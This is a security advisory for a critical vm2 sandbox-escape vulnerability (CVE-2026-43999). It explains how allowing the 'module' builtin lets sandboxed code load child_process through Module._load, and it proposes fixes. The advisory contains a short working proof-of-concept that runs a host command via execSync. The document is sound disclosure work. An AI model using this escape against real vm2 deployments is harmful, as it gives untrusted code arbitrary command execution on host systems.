PT-2026-38390 · Npm · Vm2

Published

2026-05-07

·

Updated

2026-05-07

·

CVE-2026-43999

CVSS v3.1

9.9

Critical

VectorAV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Summary

NodeVM's builtin allowlist can be bypassed when the module builtin is allowed (including via the '*' wildcard). The module builtin exposes Node's Module. load(), which loads any module by name directly in the host context, completely bypassing vm2's builtin restriction. This allows sandboxed code to load excluded builtins like child process and achieve remote code execution.

Severity

Critical (CVSS 3.1: 9.9)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
  • Attack Vector: Network — sandboxed code is typically received from external sources (user-submitted scripts, plugin code)
  • Attack Complexity: Low — no special conditions required; ['*', '-child process'] is a common, documented pattern
  • Privileges Required: Low — attacker needs only the ability to submit code to the sandbox, which is the intended use case
  • User Interaction: None
  • Scope: Changed — escape from sandbox boundary to host system
  • Confidentiality Impact: High — arbitrary command execution on the host
  • Integrity Impact: High — arbitrary command execution on the host
  • Availability Impact: High — arbitrary command execution on the host

Affected Component

  • lib/builtin.jsmakeBuiltinsFromLegacyOptions() (lines 109-117) — includes module in '*' expansion
  • lib/builtin.jsaddDefaultBuiltin() (lines 86-90) — loads module with generic readonly wrapper
  • lib/builtin.jsSPECIAL MODULES (line 61) — does NOT include module

CWE

  • CWE-863: Incorrect Authorization

Description

Root Cause: The module builtin provides unrestricted host module loading

When builtin: ['*', '-child process'] is configured, makeBuiltinsFromLegacyOptions iterates over BUILTIN MODULES and adds all modules not explicitly excluded:
// lib/builtin.js:40
const BUILTIN MODULES = (nmod.builtinModules || Object.getOwnPropertyNames(process.binding('natives')))
  .filter(s=>!s.startsWith('internal/'));

// lib/builtin.js:109-117
if (Array.isArray(builtins)) {
  const def = builtins.indexOf('*') >= 0;
  if (def) {
    for (let i = 0; i < BUILTIN MODULES.length; i++) {
      const name = BUILTIN MODULES[i];
      if (builtins.indexOf(`-${name}`) === -1) {
        addDefaultBuiltin(res, name, hostRequire);
      }
    }
  }
Node's builtinModules includes 'module' (verified: require('module').builtinModules.includes('module')true). Since only '-child process' is excluded, 'module' passes the filter and gets added.
The module builtin is NOT in SPECIAL MODULES (which only covers events, buffer, util), so it gets the generic loader:
// lib/builtin.js:86-90
function addDefaultBuiltin(builtins, key, hostRequire) {
  if (builtins.has(key)) return;
  const special = SPECIAL MODULES[key];
  builtins.set(key, special ? special : vm => vm.readonly(hostRequire(key)));
}
This wraps Node's Module class in a readonly proxy and hands it to the sandbox.

The readonly proxy does not prevent method calls

ReadOnlyHandler (bridge.js:940-983) only overrides mutation traps: set, setPrototypeOf, defineProperty, deleteProperty, isExtensible, preventExtensions. It does NOT override get or apply, which are inherited from BaseHandler.
BaseHandler.apply() (bridge.js:665-677) forwards function calls directly to the host context:
apply(target, context, args) {
  const object = getHandlerObject(this);
  let ret;
  try {
    context = otherFromThis(context);
    args = otherFromThisArguments(args);
    ret = otherReflectApply(object, context, args);
  } catch (e) {
    throw thisFromOtherForThrow(e);
  }
  return thisFromOther(ret);
}
So Module. load('child process') is forwarded to Node's native Module. load in the host context, which loads child process without any vm2 allowlist check.

Inconsistent defense: some builtins are isolated, module is not

The codebase IS aware that certain builtins need special handling:
  • events: Gets a complete sandbox-native reimplementation via lib/events.js
  • buffer: Custom loader that only exposes the Buffer class
  • util: Custom loader that replaces inherits with a sandbox-safe version
But module — which provides access to the host's entire module loading infrastructure via Module. load, Module. resolveFilename, etc. — gets no special treatment at all.

Full execution chain

  1. Host configures NodeVM with builtin: ['*', '-child process']
  2. makeBuiltinsFromLegacyOptions adds 'module' to allowed builtins (not excluded)
  3. Sandbox code calls require('module') → resolver finds 'module' in builtins → loadBuiltinModule('module')
  4. Loader calls vm.readonly(hostRequire('module')) → returns readonly proxy of Node's Module class
  5. Sandbox reads Module. loadBaseHandler.get() returns proxied function
  6. Sandbox calls Module. load('child process')BaseHandler.apply() forwards to host
  7. Host's Module. load loads child process natively (no vm2 check involved)
  8. child process module proxied back to sandbox
  9. Sandbox calls child process.execSync('id') → executes on host → RCE

Proof of Concept

const { NodeVM } = require('vm2');

// Developer thinks child process is blocked
const vm = new NodeVM({
 require: {
  builtin: ['*', '-child process'],
  external: false,
 },
});

const out = vm.run(`
 const Module = require('module');
 // Module. load bypasses vm2's builtin allowlist entirely
 const cp = Module. load('child process');
 module.exports = cp.execSync('id').toString();
`, 'poc.js');

console.log(out.trim()); // prints host uid/gid — RCE achieved

Impact

  • Complete builtin allowlist bypass: Any configuration that allows the module builtin (including ['*', '-X'] patterns) can load ANY builtin, including explicitly excluded ones.
  • Remote code execution: Sandboxed code can execute arbitrary commands on the host via child process.execSync.
  • Common configuration affected: The ['*', '-child process', '-fs'] pattern is documented and widely used by developers who want "all builtins except dangerous ones."
  • No special conditions: Unlike environment-dependent attacks, this works on every Node.js version, every OS, and every vm2 deployment that uses the '*' wildcard.
  • Additional attack surfaces via module: Beyond load, the Module class also exposes resolveFilename, cache, pathCache, and other internals that could be abused.

Recommended Remediation

Option 1: Exclude module from BUILTIN MODULES entirely (Preferred)

The module builtin provides unrestricted host module loading and should never be exposed to the sandbox:
// lib/builtin.js:40
const DANGEROUS BUILTINS = new Set(['module', 'worker threads', 'cluster']);

const BUILTIN MODULES = (nmod.builtinModules || Object.getOwnPropertyNames(process.binding('natives')))
  .filter(s => !s.startsWith('internal/') && !DANGEROUS BUILTINS.has(s));
This prevents module from being included even with the '*' wildcard. Consider also blocking worker threads and cluster which can spawn processes.

Option 2: Add module to SPECIAL MODULES with a safe wrapper

If module must be accessible, provide a sandbox-safe version that only exposes safe APIs:
// lib/builtin.js
const SPECIAL MODULES = {
  events: { /* ... existing ... */ },
  buffer: defaultBuiltinLoaderBuffer,
  util: defaultBuiltinLoaderUtil,
  module: function defaultBuiltinLoaderModule(vm) {
    // Only expose safe, read-only metadata — no load, no resolveFilename
    return vm.readonly({
      builtinModules: [...nmod.builtinModules],
      // Omit load, resolveFilename, cache, createRequire, etc.
    });
  }
};
Tradeoff: Breaks sandbox code that legitimately uses Module APIs, but those APIs are inherently unsafe in a sandbox context.

Credit

This vulnerability was discovered and reported by bugbunny.ai.

Fix

Incorrect Authorization

Weakness Enumeration

CWE-863

Related Identifiers

CVE-2026-43999
GHSA-947F-4V7F-X2V8

Affected Products

Vm2